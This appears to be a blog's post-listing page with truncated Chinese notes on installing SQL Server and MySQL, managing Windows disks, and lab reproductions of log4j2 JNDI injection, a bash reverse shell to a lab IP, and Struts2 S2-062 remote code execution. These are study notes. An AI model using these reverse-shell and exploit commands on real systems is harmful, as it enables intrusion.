linux-sqlserver2019-安装
操作系统要求要求:linux系统要求centos 7以上,内存2G以上
1.下载镜像
curl -o /etc/yum.repos.d/mssql-server.repo https://packages.microsoft.com/config/rhel/7/mssql-server-2019.repo
2.运行安装:
yum install -y mssql-server
3.包安装完成之后,运行版本设置
/opt/mssql/bin/mssql-conf setup
4.查看是否启动
systemctl status mssql-server
5.设置开机自启动
systemctl enable mssql-server
6.安装sqlcmd工具
6.1维护msprod的yum源
sudo curl -o /etc/yum.repos.d/msprod.repo https://packages.microsoft.com/config/rhel/7/prod.repo
6.2更新yum源
sudo yum update
6.3安装mssql-tools指令工具
sudo y ...
wins-sqlserver2019-安装
windows 2019下载地址,参考博客;
https://www.cnblogs.com/mq0036/p/13500880.html
或https://www.jb51.net/softjc/703811_all.html
官网下载的地址:
https://download.microsoft.com/download/c/d/4/cd466ca8-ad1e-4ba9-8590-cda56802ac85/SQLEXPRADV_x64_CHS.exe
操作步骤:
安装sqlserver2019数据库1.安装sqlserver2019数据库
2.接受许可,下一步
3.下一步
4.取消机器学习服务和语言扩展,修改sqlserver安装路径,注意目录都不能相同
4.选择默认实例,下一步
5.下一步
6.选择混合模式,输入sa密码(sa@123),添加当前用户,下一步
7.等待sqlserver数据库安装,安装成功关闭
8.打开sqlserver远程协议,使它能够远程连接
安装sqlserver管理工具studio1.在sqlserver安装中心选择第三个
2.在打 ...
wins-mssql2012-安装
windows官网各版本下载引导:sqlserver各版本介绍地址: https://www.cnblogs.com/weikui/p/16205167.html
https://sysin.org/blog/sql-server/(这上面的对应的都是补丁包,需要先安装对应的sqlserver库才能迭代升级)
Product Versions
最新服务包
Latest GDR
最新累计更新
发行日期
一般指导
SQL Server 2019
N/A
KB 4583458
CU 12(KB 5004524)
8/04/2021
SQL Server 2019 Installation
SQL Server 2017
N/A
KB 4583456
CU 26(KB 5005226)
9/14/2021
SQL Server 2017 Installation
SQL Server 2016
SP3(KB 5003279)
N/A
N/A
N/A
SQL Server 2016 Installation
SQL Server 2016
SP2(KB 4052908)
...
linux-mysql5.7-rpm方式安装
1.mysql5.7安装包官网下载(Linux&window)
https://dev.mysql.com/downloads/mysql/5.7.html
2.上传到linux服务器
rz
3.解压tar包
tar -xvf mysql-5.7.35-1.el7.x86_64.rpm-bundle.tar
4.centos默认会安装mariadb,是mysql的一个分支 需要清理
查找mariadb安装版本
rpm -qa|grep -i mariadb
卸载对应安装包
rpm -e –nodeps mariadb-libs
安装net-tools
yum install net-tools
5.然后用rpm的方式安装各个包(安装顺序:common、libs、client、server)
rpm -ivh mysql-community-common-5.7.35-1.el7.x86_64.rpm
rpm -ivh mysql-community-libs-5.7.35-1.el7.x86_64.rpm
rpm -ivh mysql-community-client-5.7 ...
wins-mysql5.7-安装
mysql5.7解压版安装:
官网下载地址:https://dev.mysql.com/downloads/mysql/5.7.html(5.7)
官网地址:
https://downloads.mysql.com/archives/community/
如图:
安装教程1.先安装mysql的依赖软件vcredist_x64.exe:
点击安装:
2.将mysql安装压缩包拷贝到服务器上,解压到对应目录下:
3.拷贝my.ini到对应的解压目录:
修改my.ini里面的框定内容:
3.设置mysql的环境变量
系统变量:MYSQL_HOME=C:\mysql-5.7.35-winx64
在系统变量path后面追加 ;%MYSQL_HOME%\bin
如图所示:
4.安装mysql
按住ctrl+shift,然后用鼠标打开命令窗口:
执行mysql安装:
1.执行mysql初始化命令: mysqld –initialize-insecure –user=mysql –console
2.执行安装mysql命令: mysqld -install
3.执行启动mysql ...
mac-mysql5.7-安装
下载安装包官网下载地址:
https://downloads.mysql.com/archives/community/
下载的是5.7.31-mysql-x86,因为5.7的没有arm版本的,所以先下载了macos-x86版本的免安装版本的:
安装1.将下载的安装包解压和创建一个my.cnf文件,如图
my.cnf内容如下:
1234567891011121314151617181920[client]# 设置mysql客户端默认字符集default-character-set=utf8[mysqld]# 设置3306端口port=3306character_set_server=utf8# 解压目录basedir=/Users/xiaotian/workapp/mysql-5.7.31-macos10.14-x86_64/# 解压目录下data目录datadir=/Users/xiaotian/workapp/mysql-5.7.31-macos10.14-x86_64/datadefault-storage-engine=INNODB[mysql]#设置mysql以及数据库的 ...
wins server 磁盘管理
修改本地磁盘盘符:
目标:将DVD驱动盘(D:)修改成(G:)
1.搜索diskmgmt.msc
2.找到驱动盘,右击选中更改驱动器号
3.选择更改,选择对应盘符
4.系统未分配的地方创建盘符分配对应空间:
5.点击下一步:
6.点击下一步:
7.分配盘符,点击下一步:
8.格式化分区,默认点击下一步:
9.点击完成:
10.完成后,可以重启服务测试下,也可以不用重启服务.
log4j2的jndi注入问题 mac本机电脑复现
1.marshalsec服务启动jndi,ldap监听,转发服务
java -cp /Users/xiaotian/workspace/github/marshalsec-master/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://127.0.0.1:8111/#Exploit"
2.用python启动http服务
cd /Users/xiaotian/temp/exploit
python -m SimpleHTTPServer 8111
3.打开idea的log4j2-apache-test项目
执行Test下Log4j2JNDITest类的main方法即可复现该问题。
但其实现在该问题是执行了该目录下的Exploit类的实例化,所以我理解的是不存在远程漏洞注入,这可能根我的jdk版本有关系。(java version “1.8.0_311”)
原因:
会执行到javax.naming.spi.NamingManager里面的147行的代码
1clas = he ...
反弹shell整理
1.本机mac通过nc启动监听
12sudo sunv -lv 6767
2.在靶机上输入shell脚本命令,反弹shell:mac->(攻击kali)
12#linux执行脚本bash -i >& /dev/tcp/192.168.2.15(mac ip)/6767 0>&1
如下图,成功截取linux系统操作
3.监控到mac目标靶机上执行的脚本
123#mac环境执行脚本sudo suzsh -i > /dev/tcp/192.168.2.15/6767
如下图所示:
参考博客:
https://juejin.cn/post/7089273867243356174 –命令参考博客
https://zhuanlan.zhihu.com/p/138393396 –反弹shell原理理解
struts2漏洞
struts2 漏洞编号:远程代码执行漏洞S2-062(CVE-2021-31805)
受影响版本
2.0.0 <= Apache Struts <= 2.5.29
不受影响版本
Apache Struts >= 2.5.30
报告时间
2022-04-12
修复时间
2022-04-14
攻击漏洞依赖jetty容器启动,tomcat容器启动没有回显命令,如下图:执行结果如下图:
12cd ~/config/python/struts/s2-062-main/python3 s2-062.py --url http://localhost:8083/ --cmd pwd
shell命令被执行了
python的exp脚本github地址: https://github.com/vulhub/vulhub
使用BurpSuite复现struts2 s2-062漏洞
拦截请求修改
123456789101112131415161718192021222324252627POST / HTTP/1.1Host: localhost:8083User-Agent: ...
